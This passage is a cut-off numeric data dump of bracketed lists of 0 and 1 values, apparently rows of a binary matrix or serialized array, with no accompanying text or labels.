1,0,0,1,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,0,1,0,1,0,1,0,1,0,0,0,0,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1],[0,1,0,0,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,1,0,0,1,0,1,1,1,0,1,0,0,1,1,0,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,0,0,1,1,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1],[1,1,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,1,1,1,0,1,1,1,1,1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,0,0,0,0,1,0,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,1,0,1],[0,0,1,0,1,1,1,0,1,1,0,1,1,1,1,1,1,1,0,1,1,1,0,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,0,0,1,0,1,0,0,1,1,0,0,1,0,1,1,1,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,1,0,0,1,1,1,1,0,0,1,1,0,1,0,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,1,1,1,0,0,1,0,1,0],[1,1,1,1,0,0,0,1,0,1,0,1,0,1,1,0,1,1,0,1,1,0,0,0,1,1,0,0,1,0,0,1,1,1,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,0,1,0,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,0,1,0,0,1,0,1,0,1,0,1,0,1,1,1,0,1,0,0,1,0,1,0,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,0,0,1],[1,1,1,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,0,1,0,0,0,1,0,0,0,0,1,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,1,0,0,0,0,
1,0,1,0,0,1,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,0,0,1,1,1,1,0,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,1,1,1,1,1,1,1,0,0,1,0,0,0,0,1],[1,0,1,1,0,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,0,1,1,1,1,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,0,1,1,0,1,1,0,1,0,0,1,1,0,1,1,1,0,1,0,0,1,0,1,1,1,1],[0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,1,0,1,1,1,1,1,0,0,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,1,0,1,0,0,1,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,0,1,0,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0],[0,0,0,1,1,0,0,0,0,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,1,0,0,0,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,1,1,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,1,1,0,0,1,1],[0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,1,0,1,1,0,1,1,1,1,1,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,0,0,0,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,1,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,1],[1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,0,1,0,0,0,0,1,1,1,0,1,1,0,1,1,1,1,0,
1,1,1,0,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,1,1,1,0,0,1,1,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1,1,0,0,0,1],[1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,0,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,0,1,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,0,1,1,0,1,0,0,1,1],[1,0,0,0,1,1,1,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,1,0,0,1,1,1,0,1,0,0,1,1,1,0,1,0,0,0,0,0,1,0,1,0,1,1,0,1,0,0,1,1,1,0,0,1,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,1,1,1,1,1,0,1,0,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,1,0,1,1,0,0,1,0,0,0,0],[0,1,0,1,0,1,0,0,0,0,1,0,1,1,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,1,1],[0,1,1,1,0,1,0,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1],[1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,0,1,1,1,1,
0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,0,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,1,0,1,1,0,1,0,1,0,0,1,0,0,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,0,1,0,1,0,1,0,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,1],[1,1,1,0,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,0,0,0,0,1,1,0,0,0,1,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,1,0,0,1,1],[0,0,1,1,0,1,1,0,1,0,0,0,1,0,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,0,0,0,1,1,0,1,1,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,0],[0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,0,0,1,1,0,1,0,0,1,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,0,1,1,0,0,1,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,1,0,0,0,1,0,0],[0,0,1,0,1,0,0,1,0,0,0,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,1,0,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,1,1,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,1,1,0,0,0,0,1,0,0,0,0,1,1,1,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,1,0,1,0,1,1,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,1,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,1,1,0,0,1,1,1],[0,
1,0,1,1,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0],[1,0,0,0,0,1,0,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,1,0,1,1,0,1,0,0,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,0,1,1,1,0,1,1,0,0,0,0,0,1,0,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,0,0],[1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,1,1,0,1,1,1,0,0,0,1,0,1,0,0,1,1,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,0,1,1,1,0,1,0,0,1,1,0,0,1,0,1,1,0,1,0,1,0,0,1,0,1,1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,0,0,0,1,1,0,0,0,1,1,1,1,1,1,0],[0,1,1,0,1,1,1,1,0,1,1,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1,1,1,1,0,0,0,0,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,1,1,0,0,0,1,0,0,0,1,0,1,0,0],[1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,1,0,1,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,0,1,0,0,1,0,1,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,0,
1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1],[1,0,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,1,1,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,1,0,0,1,0,1,1,1,0,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,1,0,0,1,1,0,0,0,0,1],[1,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,1,1,1,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,0,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,1,1,0,0,1,1,1,0,0,0,0,1,0,0,0,0,1,1,1,1,1,0,1,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1,1,1,1,0,0,0,1,1,0,1,0,1],[0,0,1,1,1,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,0,1,0,1,0,0,1,0,0,1,0,1,1,0,1,0,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,1,1,0,0,0,0,1,1,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1],[1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,0,1,1,1,1],[1,0,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,1,1,0,0,0,1,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,1,1,
0,1,1,0,0,0,1,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,0,1],[1,1,0,0,1,0,0,1,1,1,1,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,1,0,0,0,1,0,0,1,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,1,1,0,1,1,0,1,1,0,0,1,1,1,1,0,0,1,0,1,1,0,1,0,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,1,1,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,1,0,1],[1,1,0,0,1,1,0,0,0,1,1,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,1,0,0,1,1,1,1,1,1,1,0,0,0,1,0,0,0,0,1,0,1,1,0,1,0,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,1],[1,0,1,1,0,1,0,0,0,1,1,0,1,0,1,0,1,0,1,0,0,0,0,1,1,1,0,1,0,0,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,0,1,0,1,1,0,1,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,0,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,1,0,0,1,0,1,0,1,1,0,1,1,0,1,0,0,0,0,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,0,1,0,1,1,0,1,0,0,0,0,0,1,0],[0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0,0,0,1,0,0,0],[1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,0,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,0,0,1,0,1,0,0,0,1,1,1,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,0,
0,1,1,1,0,1,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,0,1,1,1,1,0,0,1,1,0,1,1,1],[0,0,0,0,1,1,0,1,0,0,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,1,1,0,1,1,0,1,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,0,1,1,1,0,1,0,1,1,1,0,0,0,0,1,0],[1,1,0,1,1,0,1,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,1,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,1,1,0,1,0],[0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,0,1,